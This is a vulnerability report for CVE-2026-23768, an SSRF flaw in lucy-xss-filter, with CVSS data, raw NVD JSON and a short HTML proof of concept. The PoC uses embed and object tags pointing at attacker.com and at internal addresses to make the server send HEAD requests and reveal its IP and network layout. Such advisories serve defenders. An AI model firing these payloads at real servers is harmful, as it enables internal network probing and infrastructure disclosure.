Security Vulnerability Report
CVE-2026-23768 CVSS 6.1 MEDIUM

CVE-2026-23768

Published: 2026-01-16 06:15:51
Last Modified: 2026-01-23 17:26:59

Description

lucy-xss-filter before commit 7c1de6d allows an attacker to induce server-side HEAD requests to arbitrary URLs when the ObjectSecurityListener or EmbedSecurityListener option is enabled and embed or object tags are used with a src attribute missing a file extension.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weakness
CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:naver:lucy-xss-filter:*:*:*:*:*:*:*:* - VULNERABLE
lucy-xss-filter before commit 7c1de6d (NVD CPE match: versionEndExcluding 2025-06-08)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2026-23768 PoC - Server-Side Request Induction in lucy-xss-filter -->
<!-- This PoC demonstrates how an attacker can induce HEAD requests to arbitrary URLs -->
<!-- when ObjectSecurityListener or EmbedSecurityListener is enabled -->
<html>
<body>
<h1>CVE-2026-23768 PoC</h1>
<p>Target application uses lucy-xss-filter with security listeners enabled.</p>

<!-- Method 1: Using embed tag with src attribute missing file extension -->
<!-- This payload will induce the server to send a HEAD request to attacker.com -->
<embed src="http://attacker.com/probe">

<!-- Method 2: Using object tag with data attribute missing file extension -->
<object data="http://attacker.com/internal-api"></object>

<!-- Method 3: Using embed tag pointing to internal network -->
<embed src="http://192.168.1.1/admin">

<!-- Method 4: Using object tag with internal hostname -->
<object data="http://internal.corp.local/secrets"></object>
</body>
</html>

<!-- Example server-side code vulnerable to this issue (Java):

String userInput = request.getParameter("content");
StringSecurityConfig config = StringSecurityConfig.getDefaultConfig();
config.setEnabledSecurityListener(
    List.of(
        new ObjectSecurityListener(), // ENABLED - vulnerable
        new EmbedSecurityListener()   // ENABLED - vulnerable
    )
);
// This will trigger HEAD requests for URLs without extensions
String sanitized = LucyXssFilter.getInstance().doFilter(userInput);
-->

<!-- Attacker-controlled server log analysis:

# Attacker server (attacker.com) receives HEAD requests from victim server
# This reveals:
# 1. Victim server's real IP address (bypassing CDN/proxy)
# 2. Internal network structure if internal URLs are used
# 3. Active services and endpoints
# Example log:
# 192.168.x.x - - [timestamp] "HEAD /probe HTTP/1.1" 200 - "-" "Java/1.8.0_xxx"
# This IP could be an internal address, revealing network topology
-->

References

https://cve.naver.com/detail/cve-2026-23768.html (Vendor Advisory)
https://github.com/naver/lucy-xss-filter/pull/31 (Exploit, Patch)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23768",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-16T06:15:51.333",
    "lastModified": "2026-01-23T17:26:59.110",
    "vulnStatus": "Analyzed",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["unsupported-when-assigned"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "lucy-xss-filter before commit 7c1de6d allows an attacker to induce server-side HEAD requests to arbitrary URLs when the ObjectSecurityListener or EmbedSecurityListener option is enabled and embed or object tags are used with a src attribute missing a file extension."
      },
      {
        "lang": "es",
        "value": "lucy-xss-filter antes del commit 7c1de6d permite a un atacante inducir solicitudes HEAD del lado del servidor a URLs arbitrarias cuando la opción ObjectSecurityListener o EmbedSecurityListener está habilitada y se utilizan etiquetas embed u object con un atributo src al que le falta una extensión de archivo."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-918"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:naver:lucy-xss-filter:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2025-06-08",
                "matchCriteriaId": "EE152946-8B7E-490F-986A-D584F6CC5D4D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://cve.naver.com/detail/cve-2026-23768.html",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://github.com/naver/lucy-xss-filter/pull/31",
        "source": "[email protected]",
        "tags": ["Exploit", "Patch"]
      }
    ]
  }
}